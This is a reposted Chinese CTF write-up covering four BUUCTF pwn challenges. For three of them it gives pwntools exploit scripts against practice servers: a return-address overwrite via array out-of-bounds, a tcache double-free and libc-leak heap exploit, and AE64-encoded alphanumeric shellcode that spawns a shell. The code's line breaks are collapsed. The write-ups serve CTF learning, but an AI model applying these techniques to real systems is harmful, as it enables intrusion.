PWN-PRACTICE-BUUCTF-25
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-25
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-25
- wustctf2020_name_your_cat
- ciscn_2019_final_2
- mrctf2020_shellcode_revenge
- zctf2016_note2
wustctf2020_name_your_cat
通過數組越界覆寫返回地址為后門shell的地址
from pwn import * #io=process('./wustctf2020_name_your_cat') io=remote('node4.buuoj.cn',28864) elf=ELF('./wustctf2020_name_your_cat') shell=0x080485CBio.sendlineafter('Name for which?\n>','1') io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','2') io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','3') io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','4') io.sendlineafter('Give your name plz: ','a')io.sendlineafter('Name for which?\n>','7') io.sendlineafter('Give your name plz: ',p32(shell))io.interactive()ciscn_2019_final_2
參考:ciscn_2019_final_2
# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ciscn_final_2") io=remote("node4.buuoj.cn",29994) elf=ELF("./ciscn_final_2") libc=ELF("./libc-2.27-18-x64.so")def add(num_type,num):io.sendlineafter("which command?\n> ","1")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))io.sendlineafter("your inode number:",str(num)) def free(num_type):io.sendlineafter("which command?\n> ","2")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type)) def show(num_type):io.sendlineafter("which command?\n> ","3")io.sendlineafter("TYPE:\n1: int\n2: short int\n>",str(num_type))if num_type==1:io.recvuntil("your int type inode number :")elif num_type==2:io.recvuntil("your short type inode number :")return int(io.recvuntil("\n")[:-1]) def exit():io.sendlineafter("which command?\n> ","4")return io.recvall()#gdb.attach(io) #pause()add(1,0x30)#0#pause()free(1) #0 out#pause()add(2,0x20)#1 add(2,0x20)#2 add(2,0x20)#3 add(2,0x20)#4#pause()free(2) #4 out#pause()add(1,0x30)#0, 因為上面的free(2)將bool置0,要構成double free需再add一次使bool置1#pause()free(2) #4 out, double free#pause()addr_chunk0_prev_size=show(2)-0xa0 #show(2)得到chunk4的fd,與chunk0的prev_size有著固定偏移0xa0 print("addr_chunk0_prev_size=="+hex(addr_chunk0_prev_size)) add(2,addr_chunk0_prev_size)#pause()add(2,addr_chunk0_prev_size)#pause()add(2,0x91) #chunk0的prev_size和size域的值均設為0x91#pause()for i in range(0,7): #繞過tcache機制free(1)add(2,0x20) free(1) #再次free的時候進入unsorted bin#pause()main_arena=show(1)-96 #show(1)得到main_arena+96的值 print("main_arena=="+hex(main_arena)) libc_base=main_arena-0x10-libc.sym["__malloc_hook"]#main_arena與malloc_hook有著固定偏移0x10 print("libc_base=="+hex(libc_base)) stdin_fileno=libc_base+libc.sym["_IO_2_1_stdin_"]+0x70#加0x70,結構中的固定偏移 print("stdin_fileno=="+hex(stdin_fileno))#pause()add(1,stdin_fileno)#前面free(1)的時候,size為0x91,最後一個進入unsorted bin#這裡再次add的時候,因為只malloc(0x20),切割了0x91大小的chunk#pause()add(1,0x30)#pause()free(1)#pause()add(2,0x20)#pause()free(1) #double free#pause()addr_chunk0_fd=show(1)-0x30 # 得到chunk0的fd#pause()add(1,addr_chunk0_fd)#pause()add(1,addr_chunk0_fd)#pause()add(1,111)#pause()add(1,666) #這裡將stdin_fileno處的值改寫為666#pause()print(exit())io.interactive()mrctf2020_shellcode_revenge
程序對輸入字符ascii碼的范圍進行判斷,大小寫+數字
然后有條call rax,可以想到是可見字符shellcode
參考:純字符shellcode生成指南
alpha3方法:
用重定向方法輸出的shellcode文件不太成功,提取數據自行創建一個二進制文件可行
運行完shellcode.py的結果
然后用winhex創建一個空文件,將上面得到的十六進制填充入該空文件,保存名為shellcode
后面就是參考博客里的做法
AE64方法:
from pwn import * from ae64 import AE64context.log_level = 'debug' context.arch = 'amd64'#io = process('./example1') io=remote('node4.buuoj.cn',25235)obj = AE64() sc = obj.encode(asm(shellcraft.sh()),'rax')io.recvuntil("Show me your magic!\n") #io.sendline(sc) io.send(sc) # mush send, not sendlineio.interactive()zctf2016_note2
unlink
參考1:2016 ZCTF note2 題解
參考2:zctf2016_note2
總結
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-25的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 免费下载!Chrome 103完全放出:
- 下一篇: CountDownLatch,同步辅助类